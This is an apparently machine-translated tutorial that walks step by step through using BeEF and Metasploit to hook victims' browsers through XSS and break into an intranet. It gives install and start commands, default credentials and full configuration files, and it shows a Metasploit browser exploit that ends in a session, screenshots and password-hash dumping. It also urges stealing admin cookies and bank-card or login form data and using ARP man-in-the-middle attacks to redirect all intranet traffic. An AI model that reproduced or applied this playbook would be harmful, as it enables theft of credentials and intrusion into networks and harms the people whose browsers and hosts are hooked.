Intranet penetration 1: Use the Xss vulnerability to access the Intranet

Intranet penetration 1: Use the Xss vulnerability to access the Intranet

0x01: Popular Science

Beef is currently The most popular WEB Framework attack platform in Europe and America. Its full name is: The Browser Exploitation Framework Project. beef uses a simple XSS vulnerability to write JavaScript (hook. js) controls the browser of the target host, obtains detailed information about the host through the browser of the target host, and further scans the Intranet. In combination with metasploit, it is definitely a killer of Intranet penetration.

0x02 Installation

Beef is not installed in Kali linux by default. You must install it on your own.

apt-get updateapt-get install beef-xss

 

0x03 getting started

0x03. 1 start

Main directory:

/Usr/share/beef-xss

cd /usr/share/beef-xss./beef

 

127.0.0.1: 3000/ui/pannel

Account Password

Beef/beef

Demos: Beef-Xss ip: 3000/demos/butcher/index.html

Test whether the network communication between the two hosts is normal:

Access the Beef demo page

The demo page is embedded with hook. js access-> zhongzhao

0x04 Trojan:

Add a script tag to the normal page to embed malicious scripts.

 

In actual penetration (a public IP address is required), how can we allow victims to access the page with hook. js embedded?

 

Website feedback page, report page case: the use of Xss fell into the background of Baidu Complaint Center

 

Of course, this student uses the Xss platform instead of beef. With Beef, not only can the Cookie of the background Administrator be obtained, but also Metasploit can be used as a stepping stone through the Administrator's host browser, enter the company intranet.

Online Browersers-> right-click and choose Use As Proxy.

Combined with ARP attacks and MITM man-in-the-middle attacks, all the Http request redirection in the internal network is basically... (here is a smile you know)

Beef background detected that there was a host going online (it felt like the gray pigeons that were playing that year, shangxing =. = Bytes)

Through the browser, we can see a lot of information about the target host:

Browser information: name VERSION: basic information of Browser UA StringBrowser PlatformWindows size plug-in: FlashVBS script Web SockQuick Time... api info Cookie OS info Date hardware info Cpu (32/64) screen resolution support Touch Screen

And So On

Test with Firefox

Beef function module components

Common functions/modules

 

1 2 3 4 5 Browser: Get the Browser information -- Hooked Domain ----- Get Cookie Get client Cookie information execute a command to display the Cookie on the right; ----- Get From Value Get the form information submitted on the page: the bank card information intercepted and the user name and password on the registration page; ----- Redirect Browser redirection

 

After implementation, the target browser will be redirected to bobao.360.cn to access any website. during actual penetration, ARP attacks will be carried out on the Intranet, redirect all Http request traffic in the Intranet to the page embedded with the Hook malicious script... (show a lustful smile here)

Chrome Extensions: Debug: Test Http request Exploits: attack Host by exploiting browser vulnerabilities: Get victim Host information Mtasploit: penetration with Metasploit, which is also the focus of this article. Network: Perform Doser, ping, DNS enumeration, port scanning, etc. Social Enhineering: Social engineering module

Interaction between 0x05 and Metasploit

Beef configuration file

/Usr/share/beef-xss

/Config. yaml

 

 metasploit:enable: false

Change

metasploit:enable: true

# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net# Browser Exploitation Framework (BeEF) - http://beefproject.com# See the file 'doc/COPYING' for copying permission## BeEF Configuration filebeef:    version: '0.4.4.5-alpha'    debug: false    restrictions:        # subnet of browser ip addresses that can hook to the framework        permitted_hooking_subnet: "0.0.0.0/0"        # subnet of browser ip addresses that can connect to the UI        # permitted_ui_subnet: "127.0.0.1/32"        permitted_ui_subnet: "0.0.0.0/0"    http:        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.        host: "0.0.0.0"        port: "3000"        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.        # It's not advised to decrease it with tons of hooked browsers (more than 50),        # because it might impact performance. Also, enable WebSockets is generally better.        xhr_poll_timeout: 5000        # if running behind a nat set the public ip address here        #public: ""        #public_port: "" # port setting is experimental        # DNS        dns_host: "localhost"        dns_port: 53        panel_path: "/ui/panel"        hook_file: "/hook.js"        hook_session_name: "BEEFHOOK"        session_cookie_name: "BEEFSESSION"        # Allow one or multiple domains to access the RESTful API using CORS        # For multiple domains use: "http://browserhacker.com, http://domain2.com"        restful_api:            allow_cors: false            cors_allowed_domains: "http://browserhacker.com"        # Prefer WebSockets over XHR-polling when possible.        websocket:          enable: false          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF          port: 61985 # WS: good success rate through proxies          secure_port: 61986 # WSSecure          ws_poll_timeout: 1000 # poll BeEF every second        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)        web_server_imitation:            enable: true            type: "apache" #supported: apache, iis        # Experimental HTTPS support for the hook / admin / all other Thin managed web services        https:            enable: false            # In production environments, be sure to use a valid certificate signed for the value            # used in beef.http.dns_host (the domain name of the server where you run BeEF)            key: "beef_key.pem"            cert: "beef_cert.pem"    database:        # For information on using other databases please read the        # README.databases file        # supported DBs: sqlite, mysql, postgres        # NOTE: you must change the Gemfile adding a gem require line like:        #   gem "dm-postgres-adapter"        # or        #   gem "dm-mysql-adapter"        # if you want to switch drivers from sqlite to postgres (or mysql).        # Finally, run a 'bundle install' command and start BeEF.        driver: "sqlite"        # db_file is only used for sqlite        db_file: "db/beef.db"        # db connection information is only used for mysql/postgres        db_host: "localhost"        db_port: 5432        db_name: "beef"        db_user: "beef"        db_passwd: "beef123"        db_encoding: "UTF-8"    # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension    credentials:        user:   "beef"        passwd: "beef"    # Autorun modules as soon the browser is hooked.    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.    autorun:        enable: true        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify        allow_user_notify: true    crypto_default_value_length: 80    # Enable client-side debugging    client:        debug: false    # You may override default extension configuration parameters here    extension:        requester:            enable: true        proxy:            enable: true        metasploit:            enable: true        social_engineering:            enable: true        evasion:            enable: false        console:             shell:                enable: false        ipec:            enable: true

# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net# Browser Exploitation Framework (BeEF) - http://beefproject.com# See the file 'doc/COPYING' for copying permission## Enable MSF by changing extension:metasploit:enable to true# Then set msf_callback_host to be the public IP of your MSF server## Ensure you load the xmlrpc interface in Metasploit# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.# Also always use the IP of your machine where MSF is listening.beef:    extension:        metasploit:            name: 'Metasploit'            enable: true            host: "172.16.244.129"            port: 55552            user: "msf"            pass: "abc123"            uri: '/api'            ssl: false            ssl_version: 'SSLv3'            ssl_verify: true            callback_host: "172.16.244.129"            autopwn_url: "autopwn"            auto_msfrpcd: false            auto_msfrpcd_timeout: 120            msf_path: [               {os: 'osx', path: '/opt/local/msf/'},              {os: 'livecd', path: '/opt/metasploit-framework/'},              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},              {os: 'bt5', path: '/opt/framework3/msf3/'},              {os: 'backbox', path: '/opt/metasploit3/msf3/'},              {os: 'win', path: 'c:\\metasploit-framework\\'},              {os: 'custom', path: '/usr/share/metasploit-framework/'}            ]

 

Modify the host callback_host parameter to the beef host IP address.

Restart ipvsq, metasploit, and service

Service postgresql restart & service metasploit restart

 

Msfconsole # Start Metasploit 1 load msgrpc ServerHost = 172.16.244.129 Pass = abc123

 

Restart Beef

Start beef. The following message is displayed: 246 metasploit EXP has been loaded. MSF should have 500 or 600 EXP updated to the latest version.

Enter the Beef background (inexplicably 245 =. = !)

Use exploit/windows/browser/ie_execcommand_uafshow optionsset srvhost 172.16.244.129exploit/run

 

The target is forcibly redirected to the monitored URL.

MSF successfully monitors the Vulnerability (however, it seems that the vulnerability has been supplemented by XP installed on the virtual machine, so no session is generated)

If XP is not patched, this EXP vulnerability exists. A session is generated.

Session-I 1

Screenshot: capture the screen of the victim to a local file

View System Information in sysinfo

Hashdump dump user Hash of the target host